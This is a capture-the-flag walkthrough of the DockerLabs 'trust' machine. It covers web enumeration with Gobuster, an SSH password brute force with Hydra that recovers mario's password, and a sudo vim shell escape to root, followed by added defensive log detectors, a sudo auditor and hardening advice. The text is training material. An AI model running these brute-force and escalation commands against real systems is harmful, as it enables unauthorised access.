trust is a Very Easy DockerLabs machine that chains three foundational techniques: web directory enumeration to discover a hidden PHP page leaking a username, SSH credential brute-forcing with Hydra to log in as that user, and a sudo vim misconfiguration to escalate directly to root. It is an excellent starter machine for practising the full end-to-end workflow — from passive web footprinting all the way to a root shell.
Machine Info

Field              Details
Difficulty         Very Easy (Muy Fácil / Súper Fácil)
Category           Infrastructure Hacking (Hacking Infraestructura)
OS                 Linux
Key Techniques     Web enumeration, Gobuster, Hydra SSH brute force, sudo abuse (vim)
Default Target IP  172.17.0.2

Phase 0: Launch Kali Portable

Open a second terminal and start your Kali Portable environment:
./run-kali.sh normal
All commands below run inside this session.

Phase 1: Deploy the Machine

Download trust.zip from DockerLabs. In your first terminal:
unzip trust.zip
chmod +x auto_deploy.sh
./auto_deploy.sh trust.tar
Two files are extracted:
  • auto_deploy.sh — Bash script that launches the container
  • trust.tar — The vulnerable Docker image

Phase 2: Reconnaissance

1. Ping Check

Verify connectivity to the container:
ping -c 3 172.17.0.2

2. Nmap Service Scan

Scan with version detection and default scripts:
nmap -sC -sV --min-rate 5000 172.17.0.2

Argument         Meaning
-sC              Runs default NSE scripts
-sV              Detects service versions
--min-rate 5000  Fast rate, suitable for isolated lab use

Findings:

Port    Service  Notes
22/tcp  SSH      Encrypted remote access
80/tcp  HTTP     Apache2 web server

Two services — a web server and SSH. The web server is the entry point.
Avoid --min-rate in real engagements. It is noisy and can trigger security controls. Use -T3 or slower with -sS for stealth.

3. Browse the Web Server

Open a browser and navigate to http://172.17.0.2. The page shows the default Apache2 Debian landing page — no custom content, no login form, nothing obviously useful. Move on to active enumeration.

Phase 3: Web Enumeration with Gobuster

The default Apache page is a dead end, but hidden files may exist beneath the surface. Use Gobuster to brute-force paths:
gobuster dir \
  -u http://172.17.0.2 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x .php,.txt,.html \
  -r \
  --exclude-length 10701 \
  -t 100

Argument                Meaning
dir                     Directory/file brute-force mode
-u http://172.17.0.2    Target URL
-w common.txt           SecLists common web paths wordlist
-x .php,.txt,.html      Also probe for these file extensions
-r                      Follow redirects automatically
--exclude-length 10701  Filter out false positives with this response length (the Apache default page)
-t 100                  100 threads for fast enumeration

The --exclude-length 10701 flag is essential here. Without it, every 404-equivalent path returns the default Apache page with a 200 status code and a content length of 10701 bytes, which would flood the results with false positives. Identify the false-positive length from any non-existent path, then filter it out.
Finding — discovered in ~10 seconds:
/secret.php   (Status: 200)
Visit http://172.17.0.2/secret.php in your browser. The page displays a simple message:
Hola Mario
The page also carries a note claiming the website cannot be hacked. Ignore the taunt: the page has inadvertently revealed a username, mario.
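
Seen from the server side, the behaviour described above (unknown paths answered with 200 and the same 10701-byte page) means an alert on 404 rates never fires during a Gobuster run. The following is an added example, not part of the original write-up: it flags clients by the number of distinct paths that came back as a miss. The log lines, KNOWN_PATHS, the threshold and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache common/combined log line: client, request, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
SOFT_404_SIZE = 10701                # default-page size reported in the write-up
KNOWN_PATHS = {"/", "/index.html"}   # assumption: pages that really are the default page
THRESHOLD = 5                        # assumption: distinct misses per client before alerting


def find_scanners(lines, soft_size=SOFT_404_SIZE, threshold=THRESHOLD):
    """Map each client IP to the sorted distinct paths it probed that came
    back as a miss, keeping only clients at or above the threshold."""
    misses = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["size"] == "-":
            continue
        path = m["path"].split("?", 1)[0]
        # A real 404, or a 200 carrying the default page, both mean "not found".
        soft = m["status"] == "200" and int(m["size"]) == soft_size
        if (m["status"] == "404" or soft) and path not in KNOWN_PATHS:
            misses[m["ip"]].add(path)
    return {ip: sorted(p) for ip, p in misses.items() if len(p) >= threshold}


def _line(ip, path, status, size):
    """Build one constructed access-log line."""
    return f'{ip} - - [01/Jan/2025:10:00:00 +0000] "GET {path} HTTP/1.1" {status} {size}'


# Constructed sample: one client sweeping a wordlist, one ordinary visitor.
WORDS = ("admin", "backup", "config.php", "login", "test.txt", "uploads")
SAMPLE = (
    [_line("172.17.0.1", f"/{w}", 200, 10701) for w in WORDS]
    + [_line("172.17.0.1", "/secret.php", 200, 927)]
    + [_line("172.17.0.9", "/", 200, 10701)]
)

if __name__ == "__main__":
    for ip, paths in find_scanners(SAMPLE).items():
        print(f"possible content discovery from {ip}: {len(paths)} missed paths")
```

Configuring the server to return a real 404 for unknown paths makes ordinary status-code alerting work again and removes the need for the size heuristic.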

Phase 4: SSH Brute Force with Hydra

With a username in hand, attempt SSH login. Entering ssh mario@172.17.0.2 and hitting enter confirms the username is accepted: the server responds with a password prompt rather than rejecting the user outright. (By default OpenSSH also prompts for usernames that do not exist, so the prompt is consistent with a valid account rather than proof of one.) Since this is a Very Easy machine, the password is likely near the top of rockyou.txt. Extract only the first 1000 most common passwords to speed up the attack significantly:
head -n 1000 /usr/share/wordlists/rockyou.txt > top1000.txt
Run Hydra against the extracted list:
hydra -l mario -P top1000.txt ssh://172.17.0.2 -t 4

Argument          Meaning
-l mario          Known username
-P top1000.txt    Trimmed password list (top 1000)
ssh://172.17.0.2  Target
-t 4              4 threads

Result (found in ~24 seconds): The password is chocolate.
[22][ssh] host: 172.17.0.2   login: mario   password: chocolate
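
On the target, a run like the one above shows up in the sshd log as a burst of failed passwords for one account from one source, ending in a success. The following is an added example, not part of the original write-up: it finds that pattern in auth-log lines. The sample lines, the min_failures threshold and the function name are constructed assumptions.

```python
import re
from collections import defaultdict

# sshd password-authentication events as they appear in auth.log / the journal.
EVENT_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(lines, min_failures=10):
    """Return {(source_ip, user): {"failures": n, "compromised": bool}} for
    every pair with at least `min_failures` failed passwords. `compromised`
    is set when a successful login from the same source follows them."""
    failures = defaultdict(int)
    findings = {}
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= min_failures:
                entry = findings.setdefault(key, {"failures": 0, "compromised": False})
                entry["failures"] = failures[key]
        elif key in findings:
            # Success after a burst of failures: the guess landed.
            findings[key]["compromised"] = True
    return findings


# Constructed sample: 12 failed guesses for mario, the successful login,
# and one unrelated failure from another host.
SAMPLE = [
    f"Jan  1 10:00:{i:02d} trust sshd[{1000 + i}]: Failed password for mario "
    f"from 172.17.0.1 port {40000 + i} ssh2"
    for i in range(12)
] + [
    "Jan  1 10:00:13 trust sshd[1013]: Accepted password for mario "
    "from 172.17.0.1 port 40013 ssh2",
    "Jan  1 10:05:00 trust sshd[1100]: Failed password for invalid user admin "
    "from 172.17.0.7 port 50000 ssh2",
]

if __name__ == "__main__":
    for (ip, user), info in detect_bruteforce(SAMPLE).items():
        print(ip, user, info)
```

Disabling password logins in favour of keys (PasswordAuthentication no in sshd_config) removes the guessable secret altogether.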

Phase 5: SSH Access

Log in with the discovered credentials:
ssh mario@172.17.0.2
# Password: chocolate
You are now inside the system as the user mario.

Phase 6: Privilege Escalation via Sudo + Vim

1. Enumerate Sudo Permissions

The first thing to check on any Linux box after gaining a shell is what sudo permissions the current user has:
sudo -l
Output:
User mario may run the following commands on trust:
    (ALL) /usr/bin/vim
The user mario can run vim as any user (including root) with sudo. This is a well-known privilege escalation path documented on GTFOBins.

2. Escalate to Root via Vim Shell

Use the GTFOBins sudo shell escape for vim — option sudo → Shell → a:
sudo vim -c ':!/bin/sh'

Part            Meaning
sudo vim        Launches vim with root privileges
-c ':!/bin/sh'  Passes a vim command that executes /bin/sh as a shell

Vim opens with root privileges and immediately drops you into an interactive /bin/sh shell running as root.

3. Verify Root Access

Confirm the escalation succeeded:
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

4. Capture the Flag

Read the root flag:
ls /root
cat /root/flag.txt
GTFOBins (gtfobins.github.io) is an indispensable reference for privilege escalation via sudo and SUID binary abuse. Any time sudo -l reveals a command you can run as root, look it up on GTFOBins immediately — many editors, scripting languages, and utilities have documented shell escape techniques.

Post-Lab Cleanup

Press Ctrl+C in the deploy terminal to stop the container. Type exit to leave your Kali Portable session.

Key Takeaways

Never Expose Information in Web Pages

The secret.php page handed us a valid username — the pivotal piece of information needed to attack SSH. Even innocuous-looking pages can leak critical data. Avoid displaying usernames, email addresses, or system names in web responses.

Targeted Wordlists Save Time

Instead of running the full rockyou.txt (14 million entries), using the top 1000 reduced the brute-force time from potentially hours to under 30 seconds. Tailor your wordlist to the context: Very Easy machines almost always use common passwords.

sudo Editor Access = Root Access

Allowing sudo on text editors (vim, nano, less, more) is functionally the same as granting a root shell. If a user needs to edit a specific config file as root, use sudoedit with a path restriction instead of granting full editor access.
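
An administrator can check for this misconfiguration before an attacker does. The following is an added example, not part of the original write-up: it audits sudo -l output and flags editor or pager grants, unrestricted ALL, and sudoedit rules without a fixed path. The binary list covers only the four programs named above, and the sample lines after the first two are constructed assumptions.

```python
import os
import re

# Assumption: only the editors/pagers named in the write-up; extend as needed.
SHELL_ESCAPE_BINARIES = {"vim", "nano", "less", "more"}
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...


def audit_sudo_l(output):
    """Return a list of (command, reason) for risky entries in `sudo -l` output."""
    findings = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        # Simplification: commands are split on commas; escaped commas are not handled.
        for raw in m["cmds"].split(","):
            cmd = TAG_RE.sub("", raw.strip())
            argv = cmd.split()
            if not argv:
                continue
            if argv[0] == "ALL":
                findings.append((cmd, "unrestricted sudo"))
            elif argv[0] == "sudoedit":
                # A path restriction only helps if the path is fixed.
                if len(argv) == 1 or any(ch in a for a in argv[1:] for ch in "*?["):
                    findings.append((cmd, "sudoedit without a fixed path"))
            elif os.path.basename(argv[0]) in SHELL_ESCAPE_BINARIES:
                findings.append((cmd, "editor/pager can spawn a shell as the target user"))
    return findings


# First two lines are the output shown in the write-up; the rest is constructed.
SAMPLE = """\
User mario may run the following commands on trust:
    (ALL) /usr/bin/vim
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/syslog
    (root) sudoedit /etc/apache2/apache2.conf
"""

if __name__ == "__main__":
    for cmd, reason in audit_sudo_l(SAMPLE):
        print(f"RISK: {cmd!r}: {reason}")
```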

GTFOBins Is Your Friend

GTFOBins catalogs shell escape techniques for dozens of binaries. During any CTF or engagement, if sudo -l returns an editor, compiler, interpreter, or file manager — GTFOBins likely has a working escalation path ready to use.
